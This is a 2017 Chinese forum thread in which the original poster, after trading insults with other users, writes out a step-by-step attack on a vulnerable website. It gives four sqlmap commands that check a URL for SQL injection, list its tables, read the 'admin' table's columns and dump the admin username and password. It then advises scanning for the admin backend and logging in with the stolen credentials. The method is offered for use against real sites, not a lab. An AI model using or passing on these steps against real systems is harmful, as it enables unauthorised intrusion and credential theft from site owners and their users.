扫一扫,访问微社区

QQ登录

只需一步,快速开始

关于对我发的帖子我说一下

高级会员

大百 发表于 2017-2-10 19:38:56 | 显示全部楼层 |阅读模式
    首先,人家大神,是爆破的游戏。
    我是弄的别的网页
    那个网页有漏洞
    我只是告诉你们方法,我不是你们的die 不需要一口一口的喂你们,方法什么的我都说了,什么软件截图里也有,自己不看明白,就瞎BB,
    爆破的方法我都一步一步的截图了,命令总共就4条,就能把 admin的账号和密码爆破出来。还想怎么样?
    爆破出来账号密码了,用软件扫那个网页的后台路径总可以吧,扫到后用账号密码登陆就行了。
    难道,人家大神 弄的那个 游戏,你看一个 看懂了 以后就盯着人家那个游戏弄吗?人家不更新吗?
    授人以鱼不如授人以渔! 学医救不了中国人,
    我只是把我学会的一点点方法告诉大家,会看图的人 就知道是什么软件,不认识字的人就瞎**
    you can you up no can no *b
    奋斗

高级会员

秋相思 发表于 2017-2-10 21:44:46 | 显示全部楼层
    大神,我加了你,你没还没通过验证,加一下我吧.,我想要工具

2万

论坛元老

双鱼座水瓶座摩羯座射手座天蝎座天秤座处女座狮子座巨蟹座双子座金牛座白羊座猴年

QQ
    楚楚 发表于 2017-2-10 23:37:42 | 显示全部楼层
    还非要别人看图 你他吗就写出来能死啊4还长篇大论在这发帖说起来。。发这么个百度一搜就能出来的东西 牛什么b?

高级会员

楼主| 大百 发表于 2017-2-10 23:59:54 | 显示全部楼层
    楚楚大神 发表于 2017-2-10 23:37
    还非要别人看图 你他吗就写出来能死啊4还长篇大论在这发帖说起来。。发这么个百度一搜就能出来的东西 牛什 ...

you can you up no can no BB
    别给你脸了,你是没长大还是怎么的,非要人一口一口的喂你,你才觉得 这才是发帖人应该做的,
    发帖人只是分享,教程网上一大堆你倒是做啊,
    你他妈看帖不看图,9年义务教育就教会你看文字了吗?
    教程全在图里,你他妈不看,关我什么事
    工具是网上的,网址是网上的,有本事你自己写工具啊。
    MDZZ

高级会员

楼主| 大百 发表于 2017-2-11 00:04:31 | 显示全部楼层
    楚楚大神 发表于 2017-2-10 23:37
    还非要别人看图 你他吗就写出来能死啊4还长篇大论在这发帖说起来。。发这么个百度一搜就能出来的东西 牛什 ...

MDZZ 我文字告诉你教程, sqlmap这是工具 网址自己百度
    命令sqlmap.py -u"url"
    先看下能否注入
    第二个命令
    sqlmap.py -u"url" --tables
    爆破出数据库名来
    第三个命令
    sqlmap.py -u"URL" --columns -T "admin"
    接着爆破admin
    第四个命令
    sqlmap.py -u"URL" --dump -C "username.password" -T "admin"
    获取admin里的账号密码。
    看懂了吗?ZZ